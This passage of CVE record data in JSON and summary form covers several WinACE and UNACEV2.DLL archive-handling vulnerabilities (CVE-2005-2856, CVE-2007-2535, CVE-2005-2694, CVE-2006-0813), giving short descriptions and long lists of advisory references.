          "url": "http://secunia.com/secunia_research/2006-30/advisory"
        },
        {
          "name": "whereisit-unacev2-bo(26315)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26315"
        },
        {
          "name": "20060428 Secunia Research: Servant Salamander unacev2.dll Buffer OverflowVulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/432357/100/0/threaded"
        },
        {
          "name": "25129",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/25129"
        },
        {
          "name": "bitzipper-unacev2-bo(27763)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27763"
        },
        {
          "name": "19834",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19834"
        },
        {
          "name": "20060515 Secunia Research: FilZip unacev2.dll Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/434011/100/0/threaded"
        },
        {
          "name": "tziptv-unacev2-bo(28787)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28787"
        },
        {
          "name": "20060509 Secunia Research: Where Is It unacev2.dll Buffer OverflowVulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/433352/100/0/threaded"
        },
        {
          "name": "20009",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/20009"
        },
        {
          "name": "izarc-unacev2-bo(26480)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26480"
        },
        {
          "name": "ADV-2006-2047",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/2047"
        },
        {
          "name": "extractnow-unacev2-ace-bo(26168)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26168"
        },
        {
          "name": "14759",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/14759"
        },
        {
          "name": "ADV-2006-1836",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1836"
        },
        {
          "name": "1016257",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1016257"
        },
        {
          "name": "19612",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19612"
        },
        {
          "name": "ADV-2006-1565",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1565"
        },
        {
          "name": "ADV-2006-1725",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/1725"
        },
        {
          "name": "1015852",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1015852"
        },
        {
          "name": "20050908 Secunia Research: ALZip ACE Archive Handling Buffer Overflow",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=112621008228458\u0026w=2"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2005-2856",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Stack-based buffer overflow in the WinACE UNACEV2.DLL third-party compression utility before 2.6.0.0, as used in multiple products including (1) ALZip 5.51 through 6.11, (2) Servant Salamander 2.0 and 2.5 Beta 1, (3) WinHKI 1.66 and 1.67, (4) ExtractNow 3.x, (5) Total Commander 6.53, (6) Anti-Trojan 5.5.421, (7) PowerArchiver before 9.61, (8) UltimateZip 2.7,1, 3.0.3, and 3.1b, (9) Where Is It (WhereIsIt) 3.73.501, (10) FilZip 3.04, (11) IZArc 3.5 beta3, (12) Eazel 1.0, (13) Rising Antivirus 18.27.21 and earlier, (14) AutoMate 6.1.0.0, (15) BitZipper 4.1 SR-1, (16) ZipTV, and other products, allows user-assisted attackers to execute arbitrary code via a long filename in an ACE archive."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "automate-unacev2-bo(26982)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26982"
            },
            {
              "name": "1016512",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016512"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-24/advisory",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-24/advisory"
            },
            {
              "name": "ADV-2006-2824",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/2824"
            },
            {
              "name": "49",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/49"
            },
            {
              "name": "19884",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/19884"
            },
            {
              "name": "eazel-ztvunacev2-bo(26479)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26479"
            },
            {
              "name": "ADV-2006-1797",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1797"
            },
            {
              "name": "20060517 Secunia Research: Eazel unacev2.dll Buffer Overflow Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/434279/100/0/threaded"
            },
            {
              "name": "1014863",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1014863"
            },
            {
              "name": "1016011",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016011"
            },
            {
              "name": "1016115",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016115"
            },
            {
              "name": "19939",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19939"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-46/advisory/",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-46/advisory/"
            },
            {
              "name": "1016065",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016065"
            },
            {
              "name": "ADV-2006-1835",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1835"
            },
            {
              "name": "1016088",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016088"
            },
            {
              "name": "ADV-2006-3495",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/3495"
            },
            {
              "name": "19967",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19967"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-27/",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-27/"
            },
            {
              "name": "1016177",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016177"
            },
            {
              "name": "1016114",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016114"
            },
            {
              "name": "powerarchiver-unacev2-ace-bo(26272)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26272"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-50/advisory/",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-50/advisory/"
            },
            {
              "name": "20060501 Secunia Research: WinHKI unacev2.dll Buffer Overflow Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/432579/100/0/threaded"
            },
            {
              "name": "19931",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19931"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-36/advisory",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-36/advisory"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-28/advisory",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-28/advisory"
            },
            {
              "name": "filzip-unacev2-bo(26447)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26447"
            },
            {
              "name": "19975",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19975"
            },
            {
              "name": "ADV-2006-1775",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1775"
            },
            {
              "name": "16479",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/16479"
            },
            {
              "name": "ultimatezip-unacev2-bo(26385)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26385"
            },
            {
              "name": "servant-salamander-unacev2-bo(26116)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26116"
            },
            {
              "name": "20060609 Secunia Research: AutoMate unacev2.dll Buffer OverflowVulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/436639/100/0/threaded"
            },
            {
              "name": "ADV-2006-1611",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1611"
            },
            {
              "name": "ADV-2006-1681",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1681"
            },
            {
              "name": "20060511 Secunia Research: UltimateZip unacev2.dll Buffer OverflowVulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/433693/100/0/threaded"
            },
            {
              "name": "ADV-2006-2184",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/2184"
            },
            {
              "name": "ADV-2006-1577",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1577"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-33/advisory/",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-33/advisory/"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-29/advisory/",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-29/advisory/"
            },
            {
              "name": "20060517 Secunia Research: IZArc unacev2.dll Buffer Overflow Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/434234/100/0/threaded"
            },
            {
              "name": "19938",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19938"
            },
            {
              "name": "19581",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19581"
            },
            {
              "name": "antitrojan-unacev2-bo(26302)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26302"
            },
            {
              "name": "ADV-2006-1694",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1694"
            },
            {
              "name": "20270",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/20270"
            },
            {
              "name": "19890",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19890"
            },
            {
              "name": "19977",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19977"
            },
            {
              "name": "winhki-unacev2-bo(26142)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26142"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-38/advisory",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-38/advisory"
            },
            {
              "name": "19596",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19596"
            },
            {
              "name": "http://secunia.com/secunia_research/2005-41/advisory/",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2005-41/advisory/"
            },
            {
              "name": "1016066",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016066"
            },
            {
              "name": "20060717 Secunia Research: BitZipper unacev2.dll Buffer OverflowVulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/440303/100/0/threaded"
            },
            {
              "name": "19458",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19458"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-25/advisory",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-25/advisory"
            },
            {
              "name": "1016012",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016012"
            },
            {
              "name": "risingantivirus-unacev2-bo(26736)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26736"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-32/advisory/",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-32/advisory/"
            },
            {
              "name": "19454",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19454"
            },
            {
              "name": "20060508 Secunia Research: Anti-Trojan unacev2.dll Buffer OverflowVulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/433258/100/0/threaded"
            },
            {
              "name": "http://secunia.com/secunia_research/2006-30/advisory",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2006-30/advisory"
            },
            {
              "name": "whereisit-unacev2-bo(26315)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26315"
            },
            {
              "name": "20060428 Secunia Research: Servant Salamander unacev2.dll Buffer OverflowVulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/432357/100/0/threaded"
            },
            {
              "name": "25129",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/25129"
            },
            {
              "name": "bitzipper-unacev2-bo(27763)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27763"
            },
            {
              "name": "19834",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19834"
            },
            {
              "name": "20060515 Secunia Research: FilZip unacev2.dll Buffer Overflow Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/434011/100/0/threaded"
            },
            {
              "name": "tziptv-unacev2-bo(28787)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28787"
            },
            {
              "name": "20060509 Secunia Research: Where Is It unacev2.dll Buffer OverflowVulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/433352/100/0/threaded"
            },
            {
              "name": "20009",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/20009"
            },
            {
              "name": "izarc-unacev2-bo(26480)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26480"
            },
            {
              "name": "ADV-2006-2047",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/2047"
            },
            {
              "name": "extractnow-unacev2-ace-bo(26168)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26168"
            },
            {
              "name": "14759",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/14759"
            },
            {
              "name": "ADV-2006-1836",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1836"
            },
            {
              "name": "1016257",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1016257"
            },
            {
              "name": "19612",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19612"
            },
            {
              "name": "ADV-2006-1565",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1565"
            },
            {
              "name": "ADV-2006-1725",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/1725"
            },
            {
              "name": "1015852",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1015852"
            },
            {
              "name": "20050908 Secunia Research: ALZip ACE Archive Handling Buffer Overflow",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=112621008228458\u0026w=2"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2005-2856",
    "datePublished": "2005-09-08T04:00:00",
    "dateReserved": "2005-09-08T00:00:00",
    "dateUpdated": "2024-08-07T22:53:28.858Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2007-2535
Vulnerability from cvelistv5
Published
2007-05-09 01:00
Modified
2024-08-07 13:42
Severity ?
Summary
WinAce allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.
References
https://exchange.xforce.ibmcloud.com/vulnerabilities/34080vdb-entry, x_refsource_XF
http://www.securityfocus.com/bid/23823vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/467646/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://osvdb.org/41750vdb-entry, x_refsource_OSVDB
http://securityreason.com/securityalert/2680third-party-advisory, x_refsource_SREASON
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T13:42:33.426Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "multiple-vendor-zoo-dos(34080)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
          },
          {
            "name": "23823",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/23823"
          },
          {
            "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
          },
          {
            "name": "41750",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/41750"
          },
          {
            "name": "2680",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/2680"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-04-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "WinAce allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-16T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "multiple-vendor-zoo-dos(34080)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
        },
        {
          "name": "23823",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/23823"
        },
        {
          "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
        },
        {
          "name": "41750",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/41750"
        },
        {
          "name": "2680",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/2680"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-2535",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "WinAce allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "multiple-vendor-zoo-dos(34080)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
            },
            {
              "name": "23823",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/23823"
            },
            {
              "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
            },
            {
              "name": "41750",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/41750"
            },
            {
              "name": "2680",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/2680"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-2535",
    "datePublished": "2007-05-09T01:00:00",
    "dateReserved": "2007-05-08T00:00:00",
    "dateUpdated": "2024-08-07T13:42:33.426Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2005-2694
Vulnerability from cvelistv5
Published
2005-08-25 04:00
Modified
2024-08-07 22:45
Severity ?
Summary
Buffer overflow in WinAce 2.6.0.5, and possibly earlier versions, allows remote attackers to execute arbitrary code via a temporary (.tmp) file that contains an entry with a long file name.
References
https://exchange.xforce.ibmcloud.com/vulnerabilities/21941vdb-entry, x_refsource_XF
http://marc.info/?l=bugtraq&m=112447630109392&w=2mailing-list, x_refsource_BUGTRAQ
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T22:45:01.874Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "winace-temporary-file-bo(21941)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21941"
          },
          {
            "name": "20050819 WinAce Temporary File Parsing Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=112447630109392\u0026w=2"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2005-08-19T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in WinAce 2.6.0.5, and possibly earlier versions, allows remote attackers to execute arbitrary code via a temporary (.tmp) file that contains an entry with a long file name."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "winace-temporary-file-bo(21941)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21941"
        },
        {
          "name": "20050819 WinAce Temporary File Parsing Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=112447630109392\u0026w=2"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2005-2694",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in WinAce 2.6.0.5, and possibly earlier versions, allows remote attackers to execute arbitrary code via a temporary (.tmp) file that contains an entry with a long file name."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "winace-temporary-file-bo(21941)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21941"
            },
            {
              "name": "20050819 WinAce Temporary File Parsing Buffer Overflow Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=112447630109392\u0026w=2"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2005-2694",
    "datePublished": "2005-08-25T04:00:00",
    "dateReserved": "2005-08-25T00:00:00",
    "dateUpdated": "2024-08-07T22:45:01.874Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2006-0813
Vulnerability from cvelistv5
Published
2006-02-24 11:00
Modified
2024-08-07 16:48
Severity ?
Summary
Heap-based buffer overflow in WinACE 2.60 allows user-assisted attackers to execute arbitrary code via a large header block in an ARJ archive.
References
http://www.vupen.com/english/advisories/2006/0709vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/17251third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/23383vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/archive/1/425894/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/secunia_research/2005-67/advisory/x_refsource_MISC
http://securitytracker.com/id?1015672vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/16786vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/479third-party-advisory, x_refsource_SREASON
https://exchange.xforce.ibmcloud.com/vulnerabilities/24872vdb-entry, x_refsource_XF
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T16:48:56.179Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ADV-2006-0709",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/0709"
          },
          {
            "name": "17251",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/17251"
          },
          {
            "name": "23383",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/23383"
          },
          {
            "name": "20060223 Secunia Research: WinACE ARJ Archive Handling Buffer Overflow",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/425894/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2005-67/advisory/"
          },
          {
            "name": "1015672",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1015672"
          },
          {
            "name": "16786",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/16786"
          },
          {
            "name": "479",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/479"
          },
          {
            "name": "winace-arj-header-bo(24872)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24872"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-02-23T00:00:00",
      "descriptions": [
        {
          "lang": "en",
